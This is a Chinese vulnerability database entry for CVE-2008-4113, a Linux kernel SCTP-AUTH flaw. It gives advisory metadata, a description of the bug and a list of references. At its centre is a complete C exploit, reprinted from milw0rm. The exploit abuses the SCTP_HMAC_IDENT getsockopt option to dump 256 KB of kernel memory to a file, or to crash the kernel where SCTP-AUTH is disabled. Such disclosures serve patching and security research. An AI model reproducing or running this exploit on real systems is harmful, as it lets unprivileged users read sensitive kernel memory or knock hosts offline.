Linux Kernel SCTP模块多个安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117156 漏洞类型 信息泄露
发布时间 2008-12-29 更新时间 2009-01-29
CVE编号 CVE-2008-4113 CNNVD-ID CNNVD-200809-230
漏洞平台 Linux CVSS评分 4.7
|漏洞来源
https://www.exploit-db.com/exploits/7618
https://cxsecurity.com/issue/WLB-2008090134
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-230
|漏洞详情
Linuxkernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。NFSv4implementation是其中的一个分布式文件系统协议。LinuxKernel在实现SCTP协议时所使用的net/sctp/socket.c在继续SCTP-AUTHAPI函数之前没有验证是否启用了SCTP-AUTH扩展,这允许攻击者通过调用sctp_setsockopt_auth_chunk、sctp_setsockopt_hmac_ident、sctp_setsockopt_auth_key、sctp_setsockopt_active_key、sctp_setsockopt_del_key、sctp_getsockopt_maxburst、sctp_getsockopt_active_key、sctp_getsockopt_peer_auth_chunks或sctp_getsockopt_local_auth_chunks等方式触发空指针引用,导致拒绝服务。如果启用了SCTP-AUTH扩展的话,net/sctp/socket.c文件中的sctp_getsockopt_hmac_ident函数依赖于不可信任的长度值限制从内核内存所拷贝的数据,net/sctp/auth.c文件中的sctp_auth_ep_set_hmacs函数没有验证标识符索引处于SCTP_AUTH_HMAC_ID_MAX所创建的范围之内,这允许本地攻击者通过特制的SCTP_HMAC_IDENTIOCTL请求获取敏感信息。
|漏洞EXP
/*
 * cve-2008-4113.c
 *
 * Linux Kernel < 2.6.26.4 SCTP kernel memory disclosure
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 * 
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4113
 *
 *   The sctp_getsockopt_hmac_ident function in net/sctp/socket.c in the Stream
 *   Control Transmission Protocol (sctp) implementation in the Linux kernel 
 *   before 2.6.26.4, when the SCTP-AUTH extension is enabled, relies on an 
 *   untrusted length value to limit copying of data from kernel memory, which 
 *   allows local users to obtain sensitive information via a crafted 
 *   SCTP_HMAC_IDENT IOCTL request involving the sctp_getsockopt function.
 *
 * Notes:
 *
 *   If SCTP AUTH is enabled (net.sctp.auth_enable = 1), this exploit allow an 
 *   unprivileged user to dump an arbitrary amount (DUMP_SIZE) of kernel memory
 *   out to a file (DUMP_FILE). If SCTP AUTH is not enabled, the exploit will 
 *   trigger a kernel OOPS.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>

#ifndef SCTP_HMAC_IDENT
#define SCTP_HMAC_IDENT 22
#endif

#define DUMP_SIZE 256*1024
#define DUMP_FILE "mem.dump"

int
main(int argc, char **argv)
{
	int ret, sock;
	FILE *dumpfile;
	char *memdump, *err;
	socklen_t memlen = DUMP_SIZE;

	memdump = malloc(DUMP_SIZE);
	if (!memdump) {
		err = "malloc(3) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}
	memset(memdump, 0, DUMP_SIZE);

	printf("[+] creating IPPROTO_SCTP socket\n");

	sock = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
	if (sock == -1) {
		err = "socket(2) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}

	printf("[+] getting socket option SCTP_HMAC_IDENT with length of %d\n", memlen);

	ret = getsockopt(sock, SOL_SCTP, SCTP_HMAC_IDENT, memdump, &memlen);
	if (ret == -1) {
		err = "getsockopt(2) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}

	printf("[+] dumping %d bytes of kernel memory to %s\n", memlen, DUMP_FILE);

	dumpfile = fopen(DUMP_FILE, "wb");
	if (!dumpfile) {
		err = "fopen(3) failed";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		return 1;
	}
	fwrite(memdump, 1, memlen, dumpfile);
	fclose(dumpfile);
	
	printf("[+] done.\n");

	return 0;
}

// milw0rm.com [2008-12-29]
|参考资料

来源:XF
名称:kernel-sctpgetsockopthmac-info-disclosure(45188)
链接:http://xforce.iss.net/xforce/xfdb/45188
来源:UBUNTU
名称:USN-659-1
链接:http://www.ubuntu.com/usn/usn-659-1
来源:MISC
链接:http://www.trapkit.de/advisories/TKADV2008-007.txt
来源:SECTRACK
名称:1021000
链接:http://www.securitytracker.com/id?1021000
来源:BID
名称:31121
链接:http://www.securityfocus.com/bid/31121
来源:BUGTRAQ
名称:20080911[TKADV2008-007]LinuxKernelSCTP-AUTHAPIInformationDisclosureVulnerabilityandNULLPointerDereferences
链接:http://www.securityfocus.com/archive/1/archive/1/496256/100/0/threaded
来源:REDHAT
名称:RHSA-2008:0857
链接:http://www.redhat.com/support/errata/RHSA-2008-0857.html
来源:MLIST
名称:[oss-security]20080926Re:CVE-2008-4113update:kernel:sctp:fixrandommemorydereferencewithSCTP_HMAC_IDENToption
链接:http://www.openwall.com/lists/oss-security/2008/09/26/6
来源:MILW0RM
名称:7618
链接:http://www.milw0rm.com/exploits/7618
来源:www.kernel.org
链接:http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.26.4
来源:DEBIAN
名称:DSA-1655
链接:http://www.debian